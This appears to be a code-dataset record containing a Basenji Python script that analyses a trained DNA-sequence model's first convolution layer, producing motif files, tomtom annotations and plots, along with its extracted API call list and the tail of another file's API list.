'ppm_max': '(15)', 'profile': '\"\"\"orbitrap\"\"\"', 'ionization_mode': '\"\"\"negative\"\"\"'}), \"(sirius_path=self.goodsirpath, features=ions,\\n ppm_max=15, profile='orbitrap', ionization_mode='negative')\\n\", (2614, 2723), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\\n'), ((3535, 3638), 'q2_qemistree.rerank_molecular_formulas', 'rerank_molecular_formulas', ([], {'sirius_path': 'self.goodsirpath', 'fragmentation_trees': 'sirout', 'features': 'ions'}), '(sirius_path=self.goodsirpath, fragmentation_trees\\n =sirout, features=ions)\\n', (3560, 3638), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\\n'), ((3924, 4018), 'q2_qemistree.predict_fingerprints', 'predict_fingerprints', ([], {'sirius_path': 'self.goodsirpath', 'molecular_formulas': 'zodout', 'ppm_max': '(15)'}), '(sirius_path=self.goodsirpath, molecular_formulas=\\n zodout, ppm_max=15)\\n', (3944, 4018), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\\n'), ((783, 
808), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\\n', (798, 808), False, 'import os\\n'), ((1086, 1131), 'os.path.join', 'os.path.join', (['THIS_DIR', '\"\"\"data/sirius.mgf.qza\"\"\"'], {}), \"(THIS_DIR, 'data/sirius.mgf.qza')\\n\", (1098, 1131), False, 'import os\\n'), ((1253, 1297), 'os.path.join', 'os.path.join', (['THIS_DIR', '\"\"\"data/sirFolder.qza\"\"\"'], {}), \"(THIS_DIR, 'data/sirFolder.qza')\\n\", (1265, 1297), False, 'import os\\n'), ((1421, 1465), 'os.path.join', 'os.path.join', (['THIS_DIR', '\"\"\"data/zodFolder.qza\"\"\"'], {}), \"(THIS_DIR, 'data/zodFolder.qza')\\n\", (1433, 1465), False, 'import os\\n'), ((1800, 1831), 'os.environ.get', 'os.environ.get', (['\"\"\"_JAVA_OPTIONS\"\"\"'], {}), \"('_JAVA_OPTIONS')\\n\", (1814, 1831), False, 'import os\\n'), ((1977, 2041), 'q2_qemistree._fingerprint.artifactory', 'artifactory', (['self.badsirpath', \"['--help']\"], {'constructor': 'OutputDirs'}), \"(self.badsirpath, ['--help'], constructor=OutputDirs)\\n\", (1988, 2041), False, 'from q2_qemistree._fingerprint import artifactory\\n'), ((3105, 3241), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '\"\"\"orbitrap\"\"\"', 'ionization_mode': '\"\"\"n3gativ3\"\"\"'}), \"(sirius_path=self.goodsirpath, features=ions,\\n ppm_max=15, profile='orbitrap', ionization_mode='n3gativ3')\\n\", (3132, 3241), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\\n')]"}}},{"rowIdx":781,"cells":{"code":{"kind":"string","value":"#!/usr/bin/env python\n# Copyright 2017 Calico LLC\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# https://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# =========================================================================\nfrom __future__ import print_function\n\nfrom optparse import OptionParser\nimport copy, os, pdb, random, shutil, subprocess, time\n\nimport h5py\nimport matplotlib\nmatplotlib.use('PDF')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import spearmanr\nimport seaborn as sns\nfrom sklearn import preprocessing\nimport tensorflow as tf\n\nimport basenji\n\n'''\nbasenji_motifs.py\n\nCollect statistics and make plots to explore the first convolution layer\nof the given model using the given sequences.\n'''\n\nweblogo_opts = '-X NO -Y NO --errorbars NO --fineprint \"\"'\nweblogo_opts += ' -C \"#CB2026\" A A'\nweblogo_opts += ' -C \"#34459C\" C C'\nweblogo_opts += ' -C \"#FBB116\" G G'\nweblogo_opts += ' -C \"#0C8040\" T T'\n\n################################################################################\n# main\n################################################################################\ndef main():\n usage = 'usage: %prog [options] '\n parser = OptionParser(usage)\n parser.add_option(\n '-a',\n dest='act_t',\n default=0.5,\n type='float',\n help=\n 'Activation threshold (as proportion of max) to consider for PWM [Default: %default]'\n )\n 
parser.add_option(\n '-d',\n dest='model_hdf5_file',\n default=None,\n help='Pre-computed model output as HDF5.')\n parser.add_option('-o', dest='out_dir', default='.')\n parser.add_option(\n '-m',\n dest='meme_db',\n default='%s/data/motifs/Homo_sapiens.meme' % os.environ['BASENJIDIR'],\n help='MEME database used to annotate motifs')\n parser.add_option(\n '-p',\n dest='plot_heats',\n default=False,\n action='store_true',\n help=\n 'Plot heat maps describing filter activations in the test sequences [Default: %default]'\n )\n parser.add_option(\n '-s',\n dest='sample',\n default=None,\n type='int',\n help='Sample sequences from the test set [Default:%default]')\n parser.add_option(\n '-t',\n dest='trim_filters',\n default=False,\n action='store_true',\n help='Trim uninformative positions off the filter ends [Default: %default]'\n )\n (options, args) = parser.parse_args()\n\n if len(args) != 3:\n parser.error(\n 'Must provide Basenji parameters and model files and test data in HDF5'\n ' format.'\n )\n else:\n params_file = args[0]\n model_file = args[1]\n data_file = args[2]\n\n if not os.path.isdir(options.out_dir):\n os.mkdir(options.out_dir)\n\n #################################################################\n # load data\n\n data_open = h5py.File(data_file)\n\n test_seqs1 = data_open['test_in']\n test_targets = data_open['test_out']\n\n try:\n target_names = list(data_open['target_labels'])\n except KeyError:\n target_names = ['t%d' % ti for ti in range(test_targets.shape[1])]\n\n if options.sample is not None:\n # choose sampled indexes\n sample_i = sorted(random.sample(range(test_seqs1.shape[0]), options.sample))\n\n # filter\n test_seqs1 = test_seqs1[sample_i]\n test_targets = test_targets[sample_i]\n\n # convert to letters\n test_seqs = basenji.dna_io.hot1_dna(test_seqs1)\n\n #################################################################\n # model parameters and placeholders\n\n job = basenji.dna_io.read_job_params(params_file)\n\n job['seq_length'] = test_seqs1.shape[1]\n job['seq_depth'] = test_seqs1.shape[2]\n job['num_targets'] = test_targets.shape[2]\n job['target_pool'] = int(np.array(data_open.get('pool_width', 1)))\n\n t0 = time.time()\n dr = basenji.seqnn.SeqNN()\n dr.build(job)\n print('Model building time %ds' % (time.time() - t0))\n\n # adjust for fourier\n job['fourier'] = 'train_out_imag' in data_open\n if job['fourier']:\n test_targets_imag = data_open['test_out_imag']\n if options.valid:\n test_targets_imag = data_open['valid_out_imag']\n\n #################################################################\n # predict\n\n # initialize batcher\n if job['fourier']:\n batcher_test = basenji.batcher.BatcherF(\n test_seqs1,\n test_targets,\n test_targets_imag,\n batch_size=dr.batch_size,\n pool_width=job['target_pool'])\n else:\n batcher_test = basenji.batcher.Batcher(\n test_seqs1,\n test_targets,\n batch_size=dr.batch_size,\n pool_width=job['target_pool'])\n\n # initialize saver\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n # load variables into session\n saver.restore(sess, model_file)\n\n # get weights\n filter_weights = sess.run(dr.filter_weights[0])\n filter_weights = np.transpose(np.squeeze(filter_weights), [2, 1, 0])\n print(filter_weights.shape)\n\n # test\n t0 = time.time()\n layer_filter_outs, _ = dr.hidden(sess, batcher_test, layers=[0])\n filter_outs = layer_filter_outs[0]\n print(filter_outs.shape)\n\n # store useful variables\n num_filters = filter_weights.shape[0]\n filter_size = filter_weights.shape[2]\n\n 
#################################################################\n # individual filter plots\n #################################################################\n # also save information contents\n filters_ic = []\n meme_out = meme_intro('%s/filters_meme.txt' % options.out_dir, test_seqs)\n\n for f in range(num_filters):\n print('Filter %d' % f)\n\n # plot filter parameters as a heatmap\n plot_filter_heat(filter_weights[f, :, :],\n '%s/filter%d_heat.pdf' % (options.out_dir, f))\n\n # write possum motif file\n filter_possum(filter_weights[f, :, :], 'filter%d' % f,\n '%s/filter%d_possum.txt' % (options.out_dir,\n f), options.trim_filters)\n\n # plot weblogo of high scoring outputs\n plot_filter_logo(\n filter_outs[:, :, f],\n filter_size,\n test_seqs,\n '%s/filter%d_logo' % (options.out_dir, f),\n maxpct_t=options.act_t)\n\n # make a PWM for the filter\n filter_pwm, nsites = make_filter_pwm('%s/filter%d_logo.fa' %\n (options.out_dir, f))\n\n if nsites < 10:\n # no information\n filters_ic.append(0)\n else:\n # compute and save information content\n filters_ic.append(info_content(filter_pwm))\n\n # add to the meme motif file\n meme_add(meme_out, f, filter_pwm, nsites, options.trim_filters)\n\n meme_out.close()\n\n #################################################################\n # annotate filters\n #################################################################\n # run tomtom\n subprocess.call(\n 'tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\n (options.out_dir, options.out_dir, options.meme_db),\n shell=True)\n\n # read in annotations\n filter_names = name_filters(\n num_filters, '%s/tomtom/tomtom.txt' % options.out_dir, options.meme_db)\n\n #################################################################\n # print a table of information\n #################################################################\n table_out = open('%s/table.txt' % options.out_dir, 'w')\n\n # print header for later panda reading\n header_cols = ('', 'consensus', 'annotation', 'ic', 'mean', 'std')\n print('%3s %19s %10s %5s %6s %6s' % header_cols, file=table_out)\n\n for f in range(num_filters):\n # collapse to a consensus motif\n consensus = filter_motif(filter_weights[f, :, :])\n\n # grab annotation\n annotation = '.'\n name_pieces = filter_names[f].split('_')\n if len(name_pieces) > 1:\n annotation = name_pieces[1]\n\n # plot density of filter output scores\n fmean, fstd = plot_score_density(\n np.ravel(filter_outs[:, :, f]),\n '%s/filter%d_dens.pdf' % (options.out_dir, f))\n\n row_cols = (f, consensus, annotation, filters_ic[f], fmean, fstd)\n print('%-3d %19s %10s %5.2f %6.4f %6.4f' % row_cols, file=table_out)\n\n table_out.close()\n\n #################################################################\n # global filter plots\n #################################################################\n if options.plot_heats:\n # plot filter-sequence heatmap\n plot_filter_seq_heat(filter_outs, '%s/filter_seqs.pdf' % options.out_dir)\n\n # plot filter-segment heatmap\n plot_filter_seg_heat(filter_outs, '%s/filter_segs.pdf' % options.out_dir)\n plot_filter_seg_heat(\n filter_outs, '%s/filter_segs_raw.pdf' % options.out_dir, whiten=False)\n\n # plot filter-target correlation heatmap\n plot_target_corr(filter_outs, seq_targets, filter_names, target_names,\n '%s/filter_target_cors_mean.pdf' % options.out_dir, 'mean')\n plot_target_corr(filter_outs, seq_targets, filter_names, target_names,\n '%s/filter_target_cors_max.pdf' % options.out_dir, 'max')\n\n\ndef get_motif_proteins(meme_db_file):\n 
\"\"\" Hash motif_id's to protein names using the MEME DB file \"\"\"\n motif_protein = {}\n for line in open(meme_db_file):\n a = line.split()\n if len(a) > 0 and a[0] == 'MOTIF':\n if a[2][0] == '(':\n motif_protein[a[1]] = a[2][1:a[2].find(')')]\n else:\n motif_protein[a[1]] = a[2]\n return motif_protein\n\n\ndef info_content(pwm, transpose=False, bg_gc=0.415):\n \"\"\" Compute PWM information content.\n\n In the original analysis, I used a bg_gc=0.5. For any\n future analysis, I ought to switch to the true hg19\n value of 0.415.\n \"\"\"\n pseudoc = 1e-9\n\n if transpose:\n pwm = np.transpose(pwm)\n\n bg_pwm = [1 - bg_gc, bg_gc, bg_gc, 1 - bg_gc]\n\n ic = 0\n for i in range(pwm.shape[0]):\n for j in range(4):\n # ic += 0.5 + pwm[i][j]*np.log2(pseudoc+pwm[i][j])\n ic += -bg_pwm[j] * np.log2(\n bg_pwm[j]) + pwm[i][j] * np.log2(pseudoc + pwm[i][j])\n\n return ic\n\n\ndef make_filter_pwm(filter_fasta):\n \"\"\" Make a PWM for this filter from its top hits \"\"\"\n\n nts = {'A': 0, 'C': 1, 'G': 2, 'T': 3}\n pwm_counts = []\n nsites = 4 # pseudocounts\n for line in open(filter_fasta):\n if line[0] != '>':\n seq = line.rstrip()\n nsites += 1\n if len(pwm_counts) == 0:\n # initialize with the length\n for i in range(len(seq)):\n pwm_counts.append(np.array([1.0] * 4))\n\n # count\n for i in range(len(seq)):\n try:\n pwm_counts[i][nts[seq[i]]] += 1\n except KeyError:\n pwm_counts[i] += np.array([0.25] * 4)\n\n # normalize\n pwm_freqs = []\n for i in range(len(pwm_counts)):\n pwm_freqs.append([pwm_counts[i][j] / float(nsites) for j in range(4)])\n\n return np.array(pwm_freqs), nsites - 4\n\n\ndef meme_add(meme_out, f, filter_pwm, nsites, trim_filters=False):\n \"\"\" Print a filter to the growing MEME file\n\n Attrs:\n meme_out : open file\n f (int) : filter index #\n filter_pwm (array) : filter PWM array\n nsites (int) : number of filter sites\n \"\"\"\n if not trim_filters:\n ic_start = 0\n ic_end = filter_pwm.shape[0] - 1\n else:\n ic_t = 0.2\n\n # trim PWM of uninformative prefix\n ic_start = 0\n while ic_start < filter_pwm.shape[0] and info_content(\n filter_pwm[ic_start:ic_start + 1]) < ic_t:\n ic_start += 1\n\n # trim PWM of uninformative suffix\n ic_end = filter_pwm.shape[0] - 1\n while ic_end >= 0 and info_content(filter_pwm[ic_end:ic_end + 1]) < ic_t:\n ic_end -= 1\n\n if ic_start < ic_end:\n print('MOTIF filter%d' % f, file=meme_out)\n print(\n 'letter-probability matrix: alength= 4 w= %d nsites= %d' %\n (ic_end - ic_start + 1, nsites),\n file=meme_out)\n\n for i in range(ic_start, ic_end + 1):\n print('%.4f %.4f %.4f %.4f' % tuple(filter_pwm[i]), file=meme_out)\n print('', file=meme_out)\n\n\ndef meme_intro(meme_file, seqs):\n \"\"\" Open MEME motif format file and print intro\n\n Attrs:\n meme_file (str) : filename\n seqs [str] : list of strings for obtaining background freqs\n\n Returns:\n mem_out : open MEME file\n \"\"\"\n nts = {'A': 0, 'C': 1, 'G': 2, 'T': 3}\n\n # count\n nt_counts = [1] * 4\n for i in range(len(seqs)):\n for nt in seqs[i]:\n try:\n nt_counts[nts[nt]] += 1\n except KeyError:\n pass\n\n # normalize\n nt_sum = float(sum(nt_counts))\n nt_freqs = [nt_counts[i] / nt_sum for i in range(4)]\n\n # open file for writing\n meme_out = open(meme_file, 'w')\n\n # print intro material\n print('MEME version 4', file=meme_out)\n print('', file=meme_out)\n print('ALPHABET= ACGT', file=meme_out)\n print('', file=meme_out)\n print('Background letter frequencies:', file=meme_out)\n print('A %.4f C %.4f G %.4f T %.4f' % tuple(nt_freqs), file=meme_out)\n print('', file=meme_out)\n\n 
return meme_out\n\n\ndef name_filters(num_filters, tomtom_file, meme_db_file):\n \"\"\" Name the filters using Tomtom matches.\n\n Attrs:\n num_filters (int) : total number of filters\n tomtom_file (str) : filename of Tomtom output table.\n meme_db_file (str) : filename of MEME db\n\n Returns:\n filter_names [str] :\n \"\"\"\n # name by number\n filter_names = ['f%d' % fi for fi in range(num_filters)]\n\n # name by protein\n if tomtom_file is not None and meme_db_file is not None:\n motif_protein = get_motif_proteins(meme_db_file)\n\n # hash motifs and q-value's by filter\n filter_motifs = {}\n\n tt_in = open(tomtom_file)\n tt_in.readline()\n for line in tt_in:\n a = line.split()\n fi = int(a[0][6:])\n motif_id = a[1]\n qval = float(a[5])\n\n filter_motifs.setdefault(fi, []).append((qval, motif_id))\n\n tt_in.close()\n\n # assign filter's best match\n for fi in filter_motifs:\n top_motif = sorted(filter_motifs[fi])[0][1]\n filter_names[fi] += '_%s' % motif_protein[top_motif]\n\n return np.array(filter_names)\n\n\n################################################################################\n# plot_target_corr\n#\n# Plot a clustered heatmap of correlations between filter activations and\n# targets.\n#\n# Input\n# filter_outs:\n# filter_names:\n# target_names:\n# out_pdf:\n################################################################################\ndef plot_target_corr(filter_outs, seq_targets, filter_names, target_names, out_pdf, seq_op='mean'):\n num_seqs = filter_outs.shape[0]\n num_targets = len(target_names)\n\n if seq_op == 'mean':\n filter_outs_seq = filter_outs.mean(axis=2)\n else:\n filter_outs_seq = filter_outs.max(axis=2)\n\n # std is sequence by filter.\n filter_seqs_std = filter_outs_seq.std(axis=0)\n filter_outs_seq = filter_outs_seq[:, filter_seqs_std > 0]\n filter_names_live = filter_names[filter_seqs_std > 0]\n\n filter_target_cors = np.zeros((len(filter_names_live), num_targets))\n for fi in range(len(filter_names_live)):\n for ti in range(num_targets):\n cor, p = spearmanr(filter_outs_seq[:, fi], seq_targets[:num_seqs, ti])\n filter_target_cors[fi, ti] = cor\n\n cor_df = pd.DataFrame(\n filter_target_cors, index=filter_names_live, columns=target_names)\n\n sns.set(font_scale=0.3)\n plt.figure()\n sns.clustermap(cor_df, cmap='BrBG', center=0, figsize=(8, 10))\n plt.savefig(out_pdf)\n plt.close()\n\n\n################################################################################\n# plot_filter_seq_heat\n#\n# Plot a clustered heatmap of filter activations in\n#\n# Input\n# param_matrix: np.array of the filter's parameter matrix\n# out_pdf:\n################################################################################\ndef plot_filter_seq_heat(filter_outs, out_pdf, whiten=True, drop_dead=True):\n # compute filter output means per sequence\n filter_seqs = filter_outs.mean(axis=2)\n\n # whiten\n if whiten:\n filter_seqs = preprocessing.scale(filter_seqs)\n\n # transpose\n filter_seqs = np.transpose(filter_seqs)\n\n if drop_dead:\n filter_stds = filter_seqs.std(axis=1)\n filter_seqs = filter_seqs[filter_stds > 0]\n\n # downsample sequences\n seqs_i = np.random.randint(0, filter_seqs.shape[1], 500)\n\n hmin = np.percentile(filter_seqs[:, seqs_i], 0.1)\n hmax = np.percentile(filter_seqs[:, seqs_i], 99.9)\n\n sns.set(font_scale=0.3)\n\n plt.figure()\n sns.clustermap(\n filter_seqs[:, seqs_i],\n row_cluster=True,\n col_cluster=True,\n linewidths=0,\n xticklabels=False,\n vmin=hmin,\n vmax=hmax)\n plt.savefig(out_pdf)\n #out_png = out_pdf[:-2] + 'ng'\n 
#plt.savefig(out_png, dpi=300)\n plt.close()\n\n\n################################################################################\n# plot_filter_seq_heat\n#\n# Plot a clustered heatmap of filter activations in sequence segments.\n#\n# Mean doesn't work well for the smaller segments for some reason, but taking\n# the max looks OK. Still, similar motifs don't cluster quite as well as you\n# might expect.\n#\n# Input\n# filter_outs\n################################################################################\ndef plot_filter_seg_heat(filter_outs, out_pdf, whiten=True, drop_dead=True):\n b = filter_outs.shape[0]\n f = filter_outs.shape[1]\n l = filter_outs.shape[2]\n\n s = 5\n while l / float(s) - (l / s) > 0:\n s += 1\n print('%d segments of length %d' % (s, l / s))\n\n # split into multiple segments\n filter_outs_seg = np.reshape(filter_outs, (b, f, s, l / s))\n\n # mean across the segments\n filter_outs_mean = filter_outs_seg.max(axis=3)\n\n # break each segment into a new instance\n filter_seqs = np.reshape(np.swapaxes(filter_outs_mean, 2, 1), (s * b, f))\n\n # whiten\n if whiten:\n filter_seqs = preprocessing.scale(filter_seqs)\n\n # transpose\n filter_seqs = np.transpose(filter_seqs)\n\n if drop_dead:\n filter_stds = filter_seqs.std(axis=1)\n filter_seqs = filter_seqs[filter_stds > 0]\n\n # downsample sequences\n seqs_i = np.random.randint(0, filter_seqs.shape[1], 500)\n\n hmin = np.percentile(filter_seqs[:, seqs_i], 0.1)\n hmax = np.percentile(filter_seqs[:, seqs_i], 99.9)\n\n sns.set(font_scale=0.3)\n if whiten:\n dist = 'euclidean'\n else:\n dist = 'cosine'\n\n plt.figure()\n sns.clustermap(\n filter_seqs[:, seqs_i],\n metric=dist,\n row_cluster=True,\n col_cluster=True,\n linewidths=0,\n xticklabels=False,\n vmin=hmin,\n vmax=hmax)\n plt.savefig(out_pdf)\n #out_png = out_pdf[:-2] + 'ng'\n #plt.savefig(out_png, dpi=300)\n plt.close()\n\n\n################################################################################\n# filter_motif\n#\n# Collapse the filter parameter matrix to a single DNA motif.\n#\n# Input\n# param_matrix: np.array of the filter's parameter matrix\n# out_pdf:\n################################################################################\ndef filter_motif(param_matrix):\n nts = 'ACGT'\n\n motif_list = []\n for v in range(param_matrix.shape[1]):\n max_n = 0\n for n in range(1, 4):\n if param_matrix[n, v] > param_matrix[max_n, v]:\n max_n = n\n\n if param_matrix[max_n, v] > 0:\n motif_list.append(nts[max_n])\n else:\n motif_list.append('N')\n\n return ''.join(motif_list)\n\n\n################################################################################\n# filter_possum\n#\n# Write a Possum-style motif\n#\n# Input\n# param_matrix: np.array of the filter's parameter matrix\n# out_pdf:\n################################################################################\ndef filter_possum(param_matrix, motif_id, possum_file, trim_filters=False, mult=200):\n # possible trim\n trim_start = 0\n trim_end = param_matrix.shape[1] - 1\n trim_t = 0.3\n if trim_filters:\n # trim PWM of uninformative prefix\n while trim_start < param_matrix.shape[1] and np.max(\n param_matrix[:, trim_start]) - np.min(\n param_matrix[:, trim_start]) < trim_t:\n trim_start += 1\n\n # trim PWM of uninformative suffix\n while trim_end >= 0 and np.max(param_matrix[:, trim_end]) - np.min(\n param_matrix[:, trim_end]) < trim_t:\n trim_end -= 1\n\n if trim_start < trim_end:\n possum_out = open(possum_file, 'w')\n print('BEGIN GROUP', file=possum_out)\n print('BEGIN FLOAT', file=possum_out)\n 
print('ID %s' % motif_id, file=possum_out)\n print('AP DNA', file=possum_out)\n print('LE %d' % (trim_end + 1 - trim_start), file=possum_out)\n for ci in range(trim_start, trim_end + 1):\n print(\n 'MA %s' % ' '.join(['%.2f' % (mult * n)\n for n in param_matrix[:, ci]]),\n file=possum_out)\n print('END', file=possum_out)\n print('END', file=possum_out)\n\n possum_out.close()\n\n\n################################################################################\n# plot_filter_heat\n#\n# Plot a heatmap of the filter's parameters.\n#\n# Input\n# param_matrix: np.array of the filter's parameter matrix\n# out_pdf:\n################################################################################\ndef plot_filter_heat(param_matrix, out_pdf):\n param_range = abs(param_matrix).max()\n\n sns.set(font_scale=2)\n plt.figure(figsize=(param_matrix.shape[1], 4))\n sns.heatmap(\n param_matrix,\n cmap='PRGn',\n linewidths=0.2,\n vmin=-param_range,\n vmax=param_range)\n ax = plt.gca()\n ax.set_xticklabels(range(1, param_matrix.shape[1] + 1))\n ax.set_yticklabels('TGCA', rotation='horizontal') # , size=10)\n plt.savefig(out_pdf)\n plt.close()\n\n\n################################################################################\n# plot_filter_logo\n#\n# Plot a weblogo of the filter's occurrences\n#\n# Input\n# param_matrix: np.array of the filter's parameter matrix\n# out_pdf:\n################################################################################\ndef plot_filter_logo(filter_outs, filter_size, seqs, out_prefix, raw_t=0, maxpct_t=None):\n if maxpct_t:\n all_outs = np.ravel(filter_outs)\n all_outs_mean = all_outs.mean()\n all_outs_norm = all_outs - all_outs_mean\n raw_t = maxpct_t * all_outs_norm.max() + all_outs_mean\n\n left_pad = (filter_size - 1) // 2\n right_pad = filter_size - left_pad\n\n # print fasta file of positive outputs\n filter_fasta_out = open('%s.fa' % out_prefix, 'w')\n filter_count = 0\n\n for i in range(filter_outs.shape[0]):\n for j in range(filter_outs.shape[1]):\n if filter_outs[i, j] > raw_t:\n # construct kmer\n kmer = ''\n\n # determine boundaries, considering padding\n fstart = j - left_pad\n fend = fstart + filter_size\n\n # if it starts in left_pad\n if fstart < 0:\n kmer += 'N' * (-fstart)\n fstart = 0\n\n # add primary sequence\n kmer += seqs[i][fstart:fend]\n\n # if it ends in right_pad\n if fend > len(seqs[i]):\n kmer += 'N' * (fend - len(seqs[i]))\n\n # output\n print('>%d_%d' % (i, j), file=filter_fasta_out)\n print(kmer, file=filter_fasta_out)\n filter_count += 1\n\n filter_fasta_out.close()\n\n # make weblogo\n if filter_count > 0:\n weblogo_cmd = 'weblogo %s < %s.fa > %s.eps' % (weblogo_opts, out_prefix,\n out_prefix)\n subprocess.call(weblogo_cmd, shell=True)\n\n\n################################################################################\n# plot_score_density\n#\n# Plot the score density and print to the stats table.\n#\n# Input\n# param_matrix: np.array of the filter's parameter matrix\n# out_pdf:\n################################################################################\ndef plot_score_density(f_scores, out_pdf):\n sns.set(font_scale=1.3)\n plt.figure()\n sns.distplot(f_scores, kde=False)\n plt.xlabel('ReLU output')\n plt.savefig(out_pdf)\n plt.close()\n\n return f_scores.mean(), f_scores.std()\n\n\n################################################################################\n# __main__\n################################################################################\nif __name__ == '__main__':\n main()\n # 
pdb.runcall(main)\n"},"apis":{"kind":"list like","value":["basenji.seqnn.SeqNN","numpy.array","basenji.dna_io.read_job_params","basenji.batcher.BatcherF","seaborn.set","numpy.reshape","seaborn.distplot","matplotlib.pyplot.xlabel","basenji.batcher.Batcher","tensorflow.Session","numpy.max","matplotlib.pyplot.close","os.path.isdir","basenji.dna_io.hot1_dna","subprocess.call","os.mkdir","numpy.min","pandas.DataFrame","scipy.stats.spearmanr","matplotlib.pyplot.savefig","matplotlib.use","seaborn.clustermap","matplotlib.pyplot.gca","seaborn.heatmap","h5py.File","numpy.squeeze","numpy.log2","numpy.transpose","time.time","sklearn.preprocessing.scale","tensorflow.train.Saver","optparse.OptionParser","numpy.swapaxes","matplotlib.pyplot.figure","numpy.random.randint","numpy.ravel","numpy.percentile"],"string":"[\n \"basenji.seqnn.SeqNN\",\n \"numpy.array\",\n \"basenji.dna_io.read_job_params\",\n \"basenji.batcher.BatcherF\",\n \"seaborn.set\",\n \"numpy.reshape\",\n \"seaborn.distplot\",\n \"matplotlib.pyplot.xlabel\",\n \"basenji.batcher.Batcher\",\n \"tensorflow.Session\",\n \"numpy.max\",\n \"matplotlib.pyplot.close\",\n \"os.path.isdir\",\n \"basenji.dna_io.hot1_dna\",\n \"subprocess.call\",\n \"os.mkdir\",\n \"numpy.min\",\n \"pandas.DataFrame\",\n \"scipy.stats.spearmanr\",\n \"matplotlib.pyplot.savefig\",\n \"matplotlib.use\",\n \"seaborn.clustermap\",\n \"matplotlib.pyplot.gca\",\n \"seaborn.heatmap\",\n \"h5py.File\",\n \"numpy.squeeze\",\n \"numpy.log2\",\n \"numpy.transpose\",\n \"time.time\",\n \"sklearn.preprocessing.scale\",\n \"tensorflow.train.Saver\",\n \"optparse.OptionParser\",\n \"numpy.swapaxes\",\n \"matplotlib.pyplot.figure\",\n \"numpy.random.randint\",\n \"numpy.ravel\",\n \"numpy.percentile\"\n]"},"extract_api":{"kind":"string","value":"[((829, 850), 'matplotlib.use', 'matplotlib.use', (['\"\"\"PDF\"\"\"'], {}), \"('PDF')\\n\", (843, 850), False, 'import matplotlib\\n'), ((1670, 1689), 'optparse.OptionParser', 'OptionParser', (['usage'], {}), '(usage)\\n', (1682, 1689), False, 'from optparse import OptionParser\\n'), ((3270, 3290), 'h5py.File', 'h5py.File', (['data_file'], {}), '(data_file)\\n', (3279, 3290), False, 'import h5py\\n'), ((3793, 3828), 'basenji.dna_io.hot1_dna', 'basenji.dna_io.hot1_dna', (['test_seqs1'], {}), '(test_seqs1)\\n', (3816, 3828), False, 'import basenji\\n'), ((3945, 3988), 'basenji.dna_io.read_job_params', 'basenji.dna_io.read_job_params', (['params_file'], {}), '(params_file)\\n', (3975, 3988), False, 'import basenji\\n'), ((4195, 4206), 'time.time', 'time.time', ([], {}), '()\\n', (4204, 4206), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((4214, 4235), 'basenji.seqnn.SeqNN', 'basenji.seqnn.SeqNN', ([], {}), '()\\n', (4233, 4235), False, 'import basenji\\n'), ((5041, 5057), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\\n', (5055, 5057), True, 'import tensorflow as tf\\n'), ((7204, 7367), 'subprocess.call', 'subprocess.call', ([\"('tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\\n (options.out_dir, options.out_dir, options.meme_db))\"], {'shell': '(True)'}), \"(\\n 'tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\\n (options.out_dir, options.out_dir, options.meme_db), shell=True)\\n\", (7219, 7367), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((14271, 14293), 'numpy.array', 'np.array', (['filter_names'], {}), '(filter_names)\\n', (14279, 14293), True, 'import numpy as np\\n'), ((15402, 15481), 'pandas.DataFrame', 'pd.DataFrame', 
(['filter_target_cors'], {'index': 'filter_names_live', 'columns': 'target_names'}), '(filter_target_cors, index=filter_names_live, columns=target_names)\\n', (15414, 15481), True, 'import pandas as pd\\n'), ((15492, 15515), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\\n', (15499, 15515), True, 'import seaborn as sns\\n'), ((15518, 15530), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (15528, 15530), True, 'import matplotlib.pyplot as plt\\n'), ((15533, 15595), 'seaborn.clustermap', 'sns.clustermap', (['cor_df'], {'cmap': '\"\"\"BrBG\"\"\"', 'center': '(0)', 'figsize': '(8, 10)'}), \"(cor_df, cmap='BrBG', center=0, figsize=(8, 10))\\n\", (15547, 15595), True, 'import seaborn as sns\\n'), ((15598, 15618), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\\n', (15609, 15618), True, 'import matplotlib.pyplot as plt\\n'), ((15621, 15632), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\\n', (15630, 15632), True, 'import matplotlib.pyplot as plt\\n'), ((16225, 16250), 'numpy.transpose', 'np.transpose', (['filter_seqs'], {}), '(filter_seqs)\\n', (16237, 16250), True, 'import numpy as np\\n'), ((16394, 16441), 'numpy.random.randint', 'np.random.randint', (['(0)', 'filter_seqs.shape[1]', '(500)'], {}), '(0, filter_seqs.shape[1], 500)\\n', (16411, 16441), True, 'import numpy as np\\n'), ((16452, 16494), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(0.1)'], {}), '(filter_seqs[:, seqs_i], 0.1)\\n', (16465, 16494), True, 'import numpy as np\\n'), ((16504, 16547), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(99.9)'], {}), '(filter_seqs[:, seqs_i], 99.9)\\n', (16517, 16547), True, 'import numpy as np\\n'), ((16551, 